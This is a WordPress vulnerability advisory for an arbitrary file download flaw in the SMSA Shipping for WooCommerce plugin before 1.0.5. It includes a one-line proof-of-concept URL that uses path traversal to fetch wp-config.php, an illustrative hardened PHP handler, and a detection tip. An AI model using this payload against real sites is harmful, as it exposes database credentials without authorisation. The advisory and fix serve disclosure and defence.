wpvulndb WPVDB-ID: 0B432858-722C-4BDA-AA95-AD48E2097302
History: Nov 22, 2022 - 12:00 a.m.

SMSA Shipping for WooCommerce < 1.0.5 - Subscriber+ Arbitrary File Download

2022-11-22 00:00:00
wpscan.com

6.5 Medium (CVSS3)

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

The plugin lacks authorisation and proper CSRF checks in its file download handler, and does not validate the file to be downloaded, allowing any authenticated user, such as a subscriber, to download arbitrary files from the server.

PoC

Open the following URL while logged in as any user: https://example.com/wp-admin/admin-ajax.php?action=ced_smsa_get_pfd_download&filename=../../../../wp-config.php
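The advisory names three missing controls in the download handler: no CSRF check, no authorisation check, and no validation of the requested file name. The following is an added illustrative example of what a hardened admin-ajax handler for the same action looks like; it is not the plugin's own code and not the actual change made in 1.0.5. The function name smsa_example_secure_download, the nonce action 'smsa_download_pdf', the manage_woocommerce capability and the wp-content/uploads/smsa-labels/ directory are assumptions chosen for the example.

```php
<?php
// Added example, not the plugin's code: a hardened handler for the
// ced_smsa_get_pfd_download admin-ajax action. Assumed names: the function,
// the nonce action 'smsa_download_pdf', the capability manage_woocommerce and
// the label directory under wp-content/uploads/smsa-labels/.

add_action( 'wp_ajax_ced_smsa_get_pfd_download', 'smsa_example_secure_download' );

function smsa_example_secure_download() {
    // 1. CSRF: require a nonce issued for this action. The legitimate caller
    //    builds its link with wp_create_nonce( 'smsa_download_pdf' ); a link a
    //    victim is lured into opening will not carry a valid one.
    check_ajax_referer( 'smsa_download_pdf', '_wpnonce' );

    // 2. Authorisation: check a capability, not merely "is logged in".
    //    Subscribers do not hold manage_woocommerce and are refused here.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 3. Path validation: reduce the request to a bare file name, resolve it
    //    under the one allowed directory, and confirm the resolved path is
    //    still inside that directory (basename() drops any ../ segments and
    //    realpath() resolves symlinks before the prefix comparison).
    $base_dir  = trailingslashit( wp_upload_dir()['basedir'] ) . 'smsa-labels/';
    $requested = isset( $_GET['filename'] ) ? wp_unslash( $_GET['filename'] ) : '';
    $name      = sanitize_file_name( basename( $requested ) );

    if ( '' === $name || 'pdf' !== strtolower( pathinfo( $name, PATHINFO_EXTENSION ) ) ) {
        wp_send_json_error( 'invalid file name', 400 );
    }

    $real_base = realpath( $base_dir );
    $real_file = realpath( $base_dir . $name );
    if ( false === $real_base || false === $real_file
        || 0 !== strpos( $real_file, trailingslashit( $real_base ) ) ) {
        // Either the file does not exist or it resolved outside the label
        // directory; report the same error for both so nothing is leaked.
        wp_send_json_error( 'not found', 404 );
    }

    // Only after all three checks pass is the file streamed.
    nocache_headers();
    header( 'Content-Type: application/pdf' );
    header( 'Content-Disposition: attachment; filename="' . $name . '"' );
    header( 'Content-Length: ' . filesize( $real_file ) );
    readfile( $real_file );
    wp_die();
}
```

The prefix comparison uses trailingslashit( $real_base ) deliberately: comparing against the bare directory path would also accept a sibling directory whose name merely starts with "smsa-labels". On the detection side, requests to admin-ajax.php whose filename parameter contains ".." or an absolute path are worth alerting on regardless of whether the plugin is patched.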

CPE Name                        Operator  Version
smsa-shipping-for-woocommerce   lt        1.0.5

